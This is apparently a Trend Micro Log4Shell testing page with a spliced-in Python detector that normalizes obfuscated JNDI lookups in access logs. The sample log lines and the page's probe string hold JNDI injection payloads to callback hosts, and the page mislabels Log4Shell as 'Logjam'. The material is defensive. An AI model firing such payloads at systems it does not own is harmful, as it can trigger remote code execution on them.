
This web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability.

It allows you to generate a request that you can run in your environment and test if the server is vulnerable.

There are three options for using this tool:

  • Use the generated JNDI snapshot: add it to any of the form fields on the site, or send it in the User-Agent HTTP header.
    • Your unique JNDI snapshot is ${jndi:ldap://log4j-tester.trendmicro.com:1389/b64c656f-ffcb-4fda-a06b-a4b8753e03cb}
  • For Internal Server: Generate a quick curl command to test your servers.
  • For Public Facing Server: Just provide the address of the server and we will try to create a simulated query. Make sure you are hitting some API endpoint/form which eventually does an action in the backend. If the unique ID provided here shows up in the results section below, the server may be vulnerable and should be investigated further. If it does not show up, it does not guarantee that the server is not vulnerable.

To learn more on how to use this tool, please visit https://www.youtube.com/watch?v=7uix6nDoLBs. The use of this tool is subject to the Trend Micro Free Tools Terms and Conditions.

Testing

Use the following tool to test your application endpoints.

  • GET
  • POST
  • with User-Agent HTTP Header
  • with X-Api-Version Header
  • with URL Parameters
  • with Form Data
  • with custom HTTP Header
  • Obfuscate data

  • System environment variables
  • System properties
  • Lower/Upper
  • Lower special
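A plain search for `${jndi:` in request logs misses probes sent with the obfuscation options listed above. The following Python detector is an added example, not part of Trend Micro's tool: it reduces nested lookups before matching. The log lines, the host `callback.example` and the function names are constructed for illustration, and only default-value (`:-`) and lower/upper forms are handled.

```python
import re
from urllib.parse import unquote

# Innermost ${...} expression: contains no nested "$", "{" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")

def resolve(expr):
    """Approximate the text Log4j substitutes for one innermost lookup."""
    prefix, _, rest = expr.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return None                    # never reduce the lookup we are hunting for
    if ":-" in expr:                   # ${env:NAME:-x}, ${sys:NAME:-x}, ${::-x}
        return expr.split(":-", 1)[1]  # assumption: the default value is what gets used
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    return None                        # unknown lookup: leave it untouched

def _substitute(match):
    value = resolve(match.group(1))
    return match.group(0) if value is None else value

def normalize(line):
    """URL-decode once, then collapse nested lookups until nothing changes."""
    text = unquote(line)
    while True:
        reduced = INNER.sub(_substitute, text)
        if reduced == text:
            return reduced.lower()
        text = reduced

def scan(lines):
    """Return (line_number, normalized_line) for each line carrying a JNDI lookup."""
    return [(n, norm) for n, norm in
            ((n, normalize(line)) for n, line in enumerate(lines, 1))
            if "${jndi:" in norm]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 "GET /api/v1/items HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 "GET / HTTP/1.1" 200 "${jndi:ldap://callback.example:1389/id-0001}"',
    '203.0.113.7 "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fid-0002%7D HTTP/1.1" 200 "-"',
    '203.0.113.7 "GET / HTTP/1.1" 200 "${${lower:J}ndi:ldap://callback.example/id-0003}"',
    '203.0.113.7 "GET / HTTP/1.1" 200 "${j${env:NOSUCHVAR:-n}di:ldap://callback.example/id-0004}"',
    '203.0.113.7 "GET /static/${version}/app.js HTTP/1.1" 404 "-"',
]

if __name__ == "__main__":
    for number, normalized in scan(SAMPLE_LOG):
        print(number, normalized)
```

Running it over your own access or application logs, with your unique ID as an extra filter, confirms whether a test request reached the logging path even when the Results table stays empty.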


You can use the generated cURL command below for testing:

curl...


Results

If you submit and see results here, that means the server may be vulnerable and should be investigated further. If there are no results, it does not guarantee that the server is not vulnerable. This table will be refreshed every 10 seconds.


Unique ID | Timestamp

Information

CVE-2021-44228

Also known as “Log4Shell” and “Logjam.” Apache Log4j2 <=2.14.1 is vulnerable to remote code execution by downloading code from an LDAP server using JNDI.

CVE-2021-45046

Apache Log4j 2.15.0 is vulnerable to a denial of service (DoS) attack when using ThreadContext values and context lookups.

Protection and Investigation

Analysis and Advisory – From Trend Micro Threat Research

Credits

Trend Micro’s vulnerability scanner is based on the following projects:
